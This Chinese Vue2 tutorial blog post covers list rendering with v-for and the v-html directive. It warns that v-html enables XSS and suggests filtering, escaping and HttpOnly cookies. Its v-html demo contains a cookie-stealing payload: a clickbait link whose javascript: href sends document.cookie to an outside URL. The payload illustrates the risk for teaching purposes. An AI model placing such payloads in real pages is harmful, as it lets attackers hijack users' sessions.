Vue 响应式渲染 - 列表布局和v-html

JSON_L2025-01-29 17:10

Vue 渐进式JavaScript 框架 基于Vue2的学习笔记 - Vue 响应式渲染 - 列表布局和v-html

目录

列表布局

简单渲染列表

显示索引值

点击变色

V-html

作用

注意

采用策略

应用

总结

列表布局

简单渲染列表

Data中设置状态,是一个数组格式的默认信息。

然后设置v-for循环渲染ul的li元素。

示例如下:

html 复制代码 
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Title</title>
    <script src="../lib/vue.js"></script>
</head>
<body>
<div id="box">
    <ul>
        <li v-for="item in datalist">{
  
  {item}}</li>
    </ul>
</div>
<script>
    new Vue({
        el: "#box", // element
        data: {
            datalist:["zhangsan", "lisi", "wangwu", "xiaoming"]
        },
        methods: {}
    })
</script>
</body>
</html>

效果如下:

显示索引值

显示列表数据的索引值。

示例如下:

html 复制代码 
<ul>
    <li v-for="(item, index) in datalist">
        {
  
  {item}}--{
  
  {index}}
    </li>
</ul>

效果如下:

点击变色

创建一个列表,点击哪一个行,哪一行显示选中效果。

示例如下:

html 复制代码 
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Title</title>
    <style>
        .active {
            background: red;
        }
    </style>
    <script src="../lib/vue.js"></script>
</head>
<body>
<div id="box">
    <ul>
        <li v-for="(item, index) in datalist" :class="current === index ? 'active': ''"
            @click="handleClick(index)">
            {
  
  {item}}
        </li>
    </ul>
</div>
<script>
    new Vue({
        el: "#box", // element
        data: {
            current: 0,
            datalist: ['面朝大海,春暖花开', '从明天起,做一个幸福的人', '喂马、劈柴,周游世界'],
        },
        methods: {
            handleClick(index) {
                this.current = index
            }
        }
    })
</script>
</body>
</html>

实现效果:

V-html

作用

更新元素的innerHTML。

注意

内容按普通 HTML插入。不会作为 Vue 模板进行编译。如果试图使用 v-html 组合模板,可以重新考虑是否通过使用组件来替代。

在网站上动态渲染任意 HTML 是非常危险的,因为容易导致 xss 攻击。

在可信内容上,不用在用户提交的内容上。

采用策略

使用V-html 需防止XSS,CSRF

前端过滤

后台转义

给cookie加上属性httponly

应用

模拟ajax请求后端数据后,使用vue解析和v-html解析展示不同效果。

示例如下:

html 复制代码 
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Title</title>
    <script src="../lib/vue.js"></script>
</head>
<body>
<div id="box">
    <div>{
  
  {mydanger}}</div>
    <div v-html="mydanger"></div>
    <button @click="handleAjax()">请求</button>
</div>
<script>
    new Vue({
        el: "#box", // element
        data: {
            mydanger: '',
        },
        methods: {
            handleAjax() {
                console.log('点击了按钮')
                // 此处为请求后端获取数据
                this.mydanger = "<a href=javascript:location.href='http://www.baidu.com?cookie='+document.cookie>震惊!!!点击查看</a>"
            }
        }
    })
</script>
</body>
</html>

效果如下:

点击链接后,会跳转链接并带着cookie,非常危险。

总结

Vue 渐进式JavaScript 框架 基于Vue2的学习笔记 - Vue 响应式渲染 - 列表布局和v-html

相关推荐
Dxy123931021621 小时前
HTML中的Canvas入门:从零开始绘制图形世界
html
滑雪的企鹅.1 天前
HTML头部元信息避坑指南大纲
前端·html
一拳不是超人1 天前
老婆天天吵吵要买塔罗牌,我直接用 AI 2 小时写了个在线塔罗牌
前端·ai编程
阿丰资源1 天前
SpringBoot+Vue实战:打造企业级在线文档管理系统
vue.js·spring boot·后端
excel1 天前
如何解决 Nuxt DevTools 中关于 unstorage 包的报错
前端
Rust研习社1 天前
使用 Axum 构建高性能异步 Web 服务
开发语言·前端·网络·后端·http·rust
C澒1 天前
AI 生码 - API2Code:接口智能匹配与 API 自动化生码全链路设计
前端·低代码·ai编程
浔川python社1 天前
HTML头部元信息避坑指南技术文章大纲
前端·html
IT_陈寒1 天前
SpringBoot配置加载顺序把我坑惨了
前端·人工智能·后端
kyriewen1 天前
Next.js部署:从本地跑得欢,到线上飞得稳
前端·react.js·next.js
热门推荐
01GitHub 镜像站点02Codex 接入 DeepSeek API 完整配置文档032026年4月AI大事件深度解读:大模型竞争进入“深水区“04近期有什么ai的新消息,新动态? 2026.4月05【AI】2026 年具身智能模型和世界模型总结062026年AI编程工具终极横评:Cursor vs Claude Code vs Copilot07实测可用|小米 MiMo 百万亿 Token 免费领,开发者速冲08在Windows 11上安装Docker的踩坑记录09裂开!ChatGPT 居然开始要手机号验证,附详细解决方法10零基础教你claude code 接入 deepseek V4